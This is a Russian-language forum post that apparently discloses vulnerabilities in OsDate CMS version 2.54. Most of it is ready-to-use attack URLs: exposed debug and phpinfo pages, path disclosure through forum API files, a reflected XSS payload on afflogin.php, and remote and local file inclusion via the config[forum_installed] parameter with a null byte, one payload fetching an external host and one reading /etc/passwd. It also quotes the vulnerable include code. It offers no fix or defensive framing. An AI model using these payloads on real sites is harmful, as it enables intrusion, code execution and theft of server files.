22.04.2010, 21:09
|
|
Познающий
Регистрация: 21.02.2009
Сообщений: 54
Провел на форуме:
1224548
Репутация:
134
|
|
OsDate CMS
Сайт: http://www.tufat.com/
Версия: 2.54, последняя на данный момент.
Информация о таблицах:../dbtest.php
Таким образом можно узнать префикс.
PHP-Info:
../admin/phpinfo.php
(права не нужны)
Раскрытия путей:
есть папка с именем forum, в ней лежат api для взаимодействия с установленными форумами, если же форумов нет, то выдаёт самые разнообразные ошибки(инклюд несуществующих файлов, ввызовы несуществующих функций) с раскрытием путей.
Список файлов:
../forum/smf_1-1_api.php
../forum/adminLogin.php
../forum/forum_db.php
../forum/myBB14_forum.php
../forum/myBB_forum.php
../forum/Phorum_forum.php
../forum/phpBB3_forum.php
../forum/phpBB_forum.php
../forum/smf11_forum.php
../forum/vBulletin_forum.php
../forum/userLogin.php
Также другие файлы:
../news.php?config[no_news]=asdf
../test.php
../chat/inc/cmses/osdateCMS_v25.php
XSS(пассивная):
../afflogin.php?errormsg=<sCript>alert(111);</sCript>
Отсутствует фильтрация.
RFI(register globals = On):../forum/adminLogin.php?config[forum_installed]=http://site/index.php%00
../forum/userLogin.php?config[forum_installed]=../../../../../../../../../etc/passwd%00
Code:
PHP код:
if ( $config['forum_installed'] == '' || $config['forum_installed'] == 'None' ) {
include_once('None_forum.php');
} else {
include_once($config['forum_installed'] . '_forum.php');
}
Ранее уже выкладывалась.
|
|
|